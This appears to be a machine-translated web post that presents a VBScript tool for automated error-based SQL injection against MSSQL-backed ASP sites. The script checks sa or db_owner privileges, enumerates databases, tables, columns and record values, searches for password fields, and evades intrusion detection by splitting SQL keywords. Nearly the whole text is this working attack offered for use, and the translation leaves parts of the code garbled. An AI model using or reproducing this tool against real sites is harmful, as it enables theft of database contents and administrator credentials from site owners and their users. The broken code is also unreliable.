This is the problem.
First, it is better to use regular expressions.
Second, I exit the loop when the returned result is greater than 30 characters in length. I believe there are no table names and field names with more than 30 letters, but the field value may be greater, this solution is not good enough. However, it is generally used to check the username and password of the background administrator, so it is abandoned.
Copy codeThe Code is as follows: set arg = wscript. arguments
If (LCase (Right (Wscript. fullname, 11) = "Wscript. Exe") Then
Wscript. Quit
End If
If arg. count = 0 then
Usage ()
Wscript. Quit
End If
Sub usage ()
Wsh. echo string (79 ,"*")
Wsh. echo "at present, only the mssql explicit and error modes are supported. directly write the url as the numeric type, write the url as the numeric type, and include the url with double quotation marks in the url"
Wsh. echo "sqlids v0.7 for mssql2000 with error by lcx"
Wsh. echo "the following two scripts can be used for mutual reference"
Wsh. echo "http://www.jb51.net/article/14172.htm"
Wsh. echo "http://hi.baidu.com/myvbscript/blog/item/5c9b29124a3fa55bf919b878.html"
Wsh. echo "Usage :"
Wsh. echo "cscript" & wscript. scriptname & "url limit | -----------> get current permission" & vbcrlf & "Ex: cscript SQL. vbs http://ww.x.com/1.asp? Id = 1 limit"
Wsh. echo "cscript" & wscript. scriptname & "url dbname | -----------> get all database names" & vbcrlf & "Ex: cscript SQL. vbs http://ww.x.com/1.asp? Id = 1 dbname"
Wsh. echo "cscript" & wscript. scriptname & "url table database name | --------> get all the table names of the given Database" & vbcrlf & "Ex: cscript SQL. vbs http://ww.x.com/1.asp? Id = 1 table
Master"
Wsh. echo "cscript" & wscript. scriptname & "url filed database name table name | ----------> obtain all fields of the table given to the Database" & vbcrlf & "Ex: cscript SQL. vbs http://ww.x.com/1.asp?
Id = 1 filed master spt_server_info"
Wsh. echo "cscript" & wscript. scriptname & "url result field name database name table name | ---> obtain the field value of the given database, table, and field" & vbcrlf & "Ex: cscript SQL. vbs http://ww.x.com/1.asp?
Id = 1 result id master sysinfo"
Wsh. echo "cscript" & wscript. scriptname & "url search the field name you want to search for | ---> search the field by keyword" & vbcrlf & "Ex: cscript SQL. vbs http://ww.x.com/1.asp? Id = 1 search
Pass"
Wsh. echo string (79, "*") & vbcrlf
End Sub
Function getHTTPPage (Path)
T = GetBody (Path)
GetHTTPPage = BytesToBstr (t, "GB2312 ")
End Function
Function UrlEncode (str)
Str = Replace (str, "", "% 20 ")
UrlEncode = str
End Function
Function GetBody (url) 'xml to get the webpage source code, which can be changed to cookie or get to submit
On Error Resume Next
Aurl = Split (url ,"? ") 'This is submitted for post
Set Retrieval = CreateObject ("Microsoft. XMLHTTP ")
With Retrieval
. Open "post", Aurl (0), False ,"",""
. SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
. SetRequestHeader "Accept-Encoding", "gzip, deflate"
. SetRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Server Load balancer;. net clr 2.0.50727; Media Center PC 5.0;. NET CLR
3.0.04506;. net clr 1.1.4322 )"
. SetRequestHeader "Connection", "Keep-Alive"
. SetRequestHeader "Cache-Control", "no-cache"
. Send UrlEncode (Aurl (1) 'Post submit
GetBody =. ResponseBody
. Abort
End
Set Retrieval = Nothing
End Function
Function BytesToBstr (Body, Cset)
Dim objstream
Set objstream = CreateObject ("adodb. stream ")
Objstream. Type = 1
Objstream. Mode = 3
Objstream. Open
Objstream. Write Body
Objstream. Position = 0
Objstream. Type = 2
Objstream. Charset = Cset
BytesToBstr = objstream. ReadTExt
Objstream. Close
Set objstream = Nothing
End Function
Function ReplaceKeyWord (Value) 'bypasses ids.
Table = "select-> se % lect | [k] | insert-> in % sert | [k] | update-> u % pdate | [k] | delete-> dele % te | [k] | drop-> dr % op | [k] | alter-> al % ter | [k] | create-> crea % te | [k] | inner-> in %
Ner | [k] | join-> jo % in | [k] | from-> fro % m | [k] | where-> w % here | [k] | union -> unio % n | [k] | group-> grou % p | [k] | by-> B % y | [k] | having-> hav % ing | [k] | table-> tab % le | [k] | shutdown-
> Shu % tdown | [k] | kill-> k % ill | [k] | declare-> dec % lare | [k] | open-> o % pen | [k] | pwdencrypt-> pwdencr % ypt | [k] | msdasql-> m % sdasql | [k] | sqloledb-> sqlo % ledb | [k] | char-> c % har |
[K] | fetch-> fe % tch | [k] | nExt-> ne % xt | [k] | allocate-> al % locate | [k] | sys-> s % ys | [k] | raiserror-> raiser % ror | [k] | Exec-> e % xec | [k] | =! -> = %! | [K] | --->-%-| [k] | xp _-> x % p _ | [k]
| Sp _-> s % p _ | [k] | and-> a % nd"
Dim I, Relpacement, Temp
Relpacement = Split (Table, "| [k] | ")
ReplaceKeyWord = Value
For I = 0 to UBound (Relpacement)
Temp = Split (Relpacement (I), "-> ")
If UBound (Temp) = 1 Then ReplaceKeyWord = Replace (ReplaceKeyWord, Temp (0), Temp (1 ))
NExt
End Function
Function result (sHTMLTEMP) 'use varchar as a keyword to separate webpage content. use regular expressions to make it easier.
AHTML = Split (sHTMLTEMP, "varchar ")
If (UBound (aHTML)> 0) Then
SHTMLTEMP = aHTML (1)
AHTML = Split (sHTMLTEMP ,"'")
SHTMLTEMP = aHTML (1)
End If
Result = sHTMLTEMP
End Function
Function Str2HEx (strHEx) 'SQL hexadecimal conversion Function
Dim sHEx
For I = 1 To Len (strHEx)
SHEx = sHEx & HEx (Asc (Mid (strHEx, I, 1) & "00"
NExt
Str2HEx = "0x" & sHEx
End Function
Function Str2HExtwo (strHEx) 'SQL hexadecimal conversion Function
Dim sHEx
For I = 1 To Len (strHEx)
SHEx = sHEx & HEx (Asc (Mid (strHEx, I, 1 )))
NExt
Str2HExtwo = "0x" & sHEx
End Function
Function MoveR (Rstr) 'deduplication
Dim I, SpStr
SpStr = Split (Rstr ,",")
For I = 0 To Ubound (Spstr)
If I = 0 then
MoveR = MoveR & SpStr (I )&","
Else
If instr (MoveR, SpStr (I) = 0 and I = Ubound (Spstr) Then
MoveR = MoveR & SpStr (I)
Elseif instr (MoveR, SpStr (I) = 0 Then
MoveR = MoveR & SpStr (I )&","
End If
End If
NExt
End Function
Function page (SQL)
Page = Replace (getHTTPPage (url & "& ReplaceKeyWord (SQL), Chr (34 ),"")
End Function
Url = arg (0)
Injection = arg (1)
'-------------------------------------- The following code is an injection statement without quotation marks.
Select case arg (1)
Case "limit"
Body = Replace (getHTTPPage (url), Chr (34 ),"")
'Statement is proposed separately for later modification. The first is sa, and the second is DB_owner.
Sqlone = "and (select is_srvrolemember (0x730079007300610064006D0069006E00)> 0 --"
Sqltwo = "and (select is_member (0x640062005F006F0077006E0065007200)> 0 --"
Bodyone = page (sqlone)
Bodytwo = page (sqltwo)
Wsh. echo "current information :"
If Len (body) = Len (Bodyone) Then wsh. echo "SA"
If Len (body) = Len (Bodytwo) And Len (body) <> Len (Bodyone) Then
Wsh. echo "DB_owner"
Else
Wsh. echo "PUBLIC"
End If
Sqlthtree = "and @ servername> 0 -- | and @ version> 0 -- | and user> 0 -- | and db_name ()> 0 --"
Rtemp = Split (sqlthtree, "| ")
Servername = result (page (rtemp (0 )))
Version = result (page (rtemp (1 )))
User = result (page (rtemp (2 )))
Db_name = result (page (rtemp (3 )))
Wsh. echo "servername:" & servername
Wsh. echo "version:" & version
Wsh. echo "user:" & user
Wsh. echo "db_name:" & db_name
Case "dbname"
I = 1
Do
SQL = "and db_name (" & I & ")> 0 --" 'database name statement
Body = page (SQL)
K = Limit Rev (body, "varchar",-1, 0)
I = I + 1
If k <> 0 Then
Wscript. echo result (body)
Else
Wsh. echo "========= over ==================="
End if
Loop Until k = 0
Case "table"
I = 1
Do
'Table name statement agr (2) indicates the database
SQL = "and 0 <> (select top 1 name from" & arg (2 )&". dbo. sysobjects where xtype = 0x7500 and name not in (select top "& I &" name from "& arg (2 )&". dbo. sysobjects
Where xtype = 0x7500 ))--"
Body = page (SQL)
K = Limit Rev (body, "varchar",-1, 0)
I = I + 1
If k <> 0 Then
Wscript. echo result (body)
Else
Wsh. echo "========= over ==================="
End if
Loop Until k = 0
Case "filed"
Sqlbiaoid = "an % d (se % l % e % c % t to % p 1 ca % st (id as nvarch % ar (20) % 2bch % ar (124) fr % om ["& arg (2) &"] .. [sy % sob % je % cts] wh % ere name = "& Str2HEx (arg (3) &") = 0 --
"
Biaoid = result (page (sqlbiaoid ))
Biaoid = Replace (biaoid, Chr (124 ),"")
Sqlclounmcnt = "an % d (se % l % e % c % t ca % st (co % unt (1) as varch % ar (10 )) % 2bch % ar (94) fr % om ["& arg (2) &"] .. [sys % columns] wh % ere id = "& biaoid &") = 0 --"
K = Replace (result (page (sqlclounmcnt), Chr (94 ),"")
Wsh. echo "A total of column names" & k"
For I = 1 To k
Sqlfiled = "an % d (se % l % e % c % t to % p 1 ca % st (name as varch % ar (8000 )) fr % om (se % l % e % c % t to % p "& I &" colid, name fr % om ["& arg (2) &"] .. [sys % columns] wh % ere
Id = "& biaoid &" order by colid) t order by colid desc) = 0 --"
Wsh. echo result (page (sqlfiled ))
NExt
Case "result"
I = 1
Sqlcloum = "and (select cast (count (1) as varch % ar (8000) % 2 bchar (94) from [" & arg (3) & "] .. ["& arg (4) &"] where 1 = 1)> 0 -- "'Statement of the total number of violent Columns
K = result (page (sqlcloum ))
K = Replace (k, Chr (94 ),"")
Wsh. echo arg (2) & "Total number of records in the field" & k & "& vbcrlf
For I = 1 To k
Sqlneirong = "an % d (se % l % e % c % t to % p 1 ca % st (" & arg (2) & "as varch % ar) % 2bch % ar (94) fr % om (se % l % e % c % t to % p "& I &" ["& arg (2) & "] fr % om [" & arg (3) & "] .. ["& arg (4)
& "] Wh % ere 1 = 1 order by [" & arg (2) & "]) t wh % ere 1 = 1 order by [" & arg (2) & "] desc) = 0 --"
Body = page (sqlneirong)
Wscript. echo Replace (result (body), Chr (94 ),"")
Next
Case "search"
Love = Str2HExtwo (arg (2 ))
Wscript. echo "Please wait, query, and only 10 columns are displayed. The result is displayed in 'table name | field name' format"
TimeSpend = Timer
For I = 1 To 10' you can change this 10 as needed
Sqlsearch = "And (select/**/top/**/1/**/t_name % 2 bchar (124) % 2bc_name/**/from/**/(select/**/top/**/"& I &"/**/object_name (id) /**/as/**/t_name, name /*
*/As/**/c_name/**/from/**/syscolumns/**/where/**/charindEx (cast ("& love &"/**/ as/***/varchar (2000 )), name) % 3E0/**/and/**/left (name, 1 )! = 0x40/**/order /*
*/By/**/t_name/**/asc) /**/as/**/T/**/order/**/by/**/t_name/**/desc)> 0 --"
Body = page (sqlsearch)
Body = result (body)
A = a & body &","
NExt
TimeSpend = round (Timer-TimeSpend, 2)
Wsh. echo MoveR ()
Wsh. echo "time:" & TimeSpend & "seconds ."
Case Else
If arg (1) <> "limit" Or arg (1) <> "dbname" Or arg (1) <> "search" Or arg (1) <> "table" Or arg (1) <> "filed" Then
Wscript. echo "note Parameters"
Usage ()
End if
End select